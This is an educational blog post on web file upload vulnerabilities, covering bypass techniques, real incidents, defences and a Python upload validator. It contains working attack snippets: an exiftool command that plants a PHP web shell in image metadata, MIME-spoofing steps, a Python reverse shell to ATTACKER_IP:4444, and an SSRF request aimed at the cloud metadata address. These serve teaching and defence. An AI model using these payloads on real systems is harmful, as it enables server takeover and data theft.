
Hey guys, Rocky here!
Welcome to Day 7 of the Daily Web Hacking series! So far, we've dissected XSS, CSRF, and Burp Suite. Today, we're diving into Part 7: File Upload Vulnerabilities, the hack that turns harmless files like cat.jpg into malicious shell.php. Imagine a Trojan horse disguised as a cute kitten GIF. Let's break it down!
What Are File Upload Vulnerabilities?
File upload vulnerabilities occur when a web app allows users to upload files without proper validation. Attackers exploit this to:
- Upload web shells (malicious scripts).
- Execute commands on the server.
- Steal data, deface sites, or pivot to internal networks.
Why it's dangerous:
- Ranked #9 in the OWASP Top 10 (2021).
- 52% of web apps have insecure file uploads (Acunetix, 2023).
- A single malicious file can lead to full server takeover.
How File Upload Attacks Work
Let's say a site lets users upload profile pictures. If it doesn't validate files properly:
- Attacker uploads shell.php disguised as cat.jpg.
- Server saves it to a public directory like /uploads.
- Attacker visits https://site.com/uploads/shell.php.
- Server executes the PHP code, granting the attacker control.
Key Insight: The server's trust in uploaded files is the vulnerability.
Types of File Upload Attacks
1. Web Shell Upload
2. Malicious File Execution
- How: Upload files with double extensions (e.g., cat.jpg.php).
- Why it works: the app checks only the first extension.
3. Overwriting Critical Files
4. Polyglot Files
What: Files that are valid as multiple types (e.g., a JPEG thatās also PHP).
Create with ExifTool:
exiftool -Comment='<?php system($_GET["cmd"]); ?>' cat.jpg -o polyglot.php.jpg
Real-World Disasters
- Facebook (2012): Malicious JPEGs could execute PHP code.
- ImageMagick (2016): CVE-2016-3714 let attackers upload SVG files to run shell commands.
- Drupal (2018): File module flaw allowed PHP uploads.
Lesson: Even giants fall.
Step-by-Step Exploitation
Goal: Upload a web shell to a vulnerable site.
1. Find the Upload Form
- Profile pictures, document uploads, support tickets.
2. Test for Validation Bypass
Trick 1: Rename shell.php to shell.php.jpg.
Trick 2: Use Burp to tamper with the Content-Type header:
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg # Spoof MIME type
3. Upload the File
- If the server responds with a path like /uploads/shell.php, you've won.
4. Execute Commands
- Visit https://site.com/uploads/shell.php?cmd=id to see the server's user.
Bypassing File Upload Defenses
1. Client-Side Validation
- Bypass: Disable JavaScript or use Burp to intercept/modify the request.
2. Blacklist Filters
- Bypass: Use rare extensions (.phtml, .phar, .htaccess).
3. File Type Detection
- Bypass: Spoof MIME types or magic bytes (e.g., GIF89a; <?php ... ?>).
4. Image Resizing
- Bypass: Embed PHP code in image metadata (e.g., EXIF comments).
Defending Against File Upload Attacks
For Developers
Use Allowlists, Not Blocklists
Allow only specific extensions (e.g., .jpg, .png).
PHP Example:
$allowed = ['jpg', 'png', 'pdf'];
$name = basename($_FILES['file']['name']);   // client-supplied name: used only for this extension check
$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
if (!in_array($ext, $allowed, true)) { die("Invalid file!"); }
Validate Content, Not Just Headers
Rename Uploaded Files
Store Files Outside the Web Root
Set Proper Permissions
Scan Files with Antivirus
For Server Admins
Disable Execution in Uploads Directory
Limit File Size
Use a Web Application Firewall (WAF)
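As an added example (not code from the original post), here is a Python version of the server-side checks listed above: an extension allowlist tied to magic bytes, one extension only, a scan for embedded script markers to catch the polyglot trick described earlier, and a random server-chosen storage name. The extension list, size cap and marker list are my assumptions; adapt them to what the app actually needs.

```python
import os
import re
import secrets

# Allowlist of accepted extensions, each tied to the magic bytes its content must
# start with. Anything not listed is rejected (allowlist, not blocklist).
ALLOWED_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
# Server-side script markers. A polyglot ("GIF89a; <?php ...", PHP in an EXIF
# comment) passes the magic-byte check, so the whole body is scanned for these too.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")
MAX_BYTES = 2 * 1024 * 1024  # assumed size cap: 2 MiB


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason or extension). Trusts neither the client's filename
    nor its Content-Type header; only the bytes and the allowlist decide."""
    if len(data) > MAX_BYTES:
        return False, "file too large"
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path component
    if "\x00" in base:
        return False, "bad filename"  # null-byte truncation tricks
    parts = base.lower().split(".")
    # Exactly one extension and a plain stem: rejects cat.jpg.php, shell.php.jpg, .htaccess
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED_MAGIC:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match extension"  # a spoofed MIME type alone fails here
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return False, "embedded script detected"  # polyglot or metadata payload
    return True, ext


def storage_name(ext: str) -> str:
    """Random server-chosen name: the uploader never controls the stored path or extension."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads (not real files): an honest JPEG and a JPEG/PHP polyglot.
    honest = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    polyglot = b"\xff\xd8\xff\xe1Exif\x00\x00<?php echo 1; ?>"
    print(validate_upload("cat.jpg", honest), validate_upload("cat.jpg", polyglot))
```

Pair this with the remaining items in the list: save the file under the random name outside the web root and disable script execution in the upload directory, because the content scan is a heuristic and not a substitute for those.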
Tools for Testing File Uploads
1. Burp Suite
- Intercept/modify upload requests.
- Test for MIME spoofing and parameter tampering.
2. Web Shells
PHP: PentestMonkey Reverse Shell.
Python:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("ATTACKER_IP",4444))
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
3. ExifTool
- Inject PHP code into image metadata.
4. Metasploit
Real-World Attack Walkthrough
Objective: Upload a PHP shell to a vulnerable blogging platform.
1. Recon
- Find the avatar upload feature at /profile/upload.
2. Bypass Client-Side Validation
- Rename shell.php to shell.jpg and intercept with Burp.
- Change filename to shell.php and MIME type to image/jpeg.
3. Upload & Execute
4. Escalate Access
Ethical Hacking & Reporting
Never exploit file upload flaws without permission. If you find one:
- Document: Record steps to reproduce.
- Report: Use the site's security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
Whatās Next? Part 8: Server-Side Request Forgery (SSRF)
Tomorrow, we'll explore SSRF: tricking servers into fetching internal resources. Sneak peek:
GET /proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Final Thoughts
File upload vulnerabilities are a hacker's golden ticket. They're easy to exploit but hard to defend against. By combining strict validation, server hardening, and constant vigilance, you can turn this attack vector into a fortress.
Remember: The web's security is a team effort. Find flaws, report them, and make the internet safer, one upload at a time.
Rocky out!
P.S. If you're loving this series, share it with your hacking squad! Let's turn script kiddies into security heroes.
Discussion Question: What's the wildest file upload bypass you've seen? I once saw a .php.gif file that executed code and displayed a dancing banana. Drop your stories below!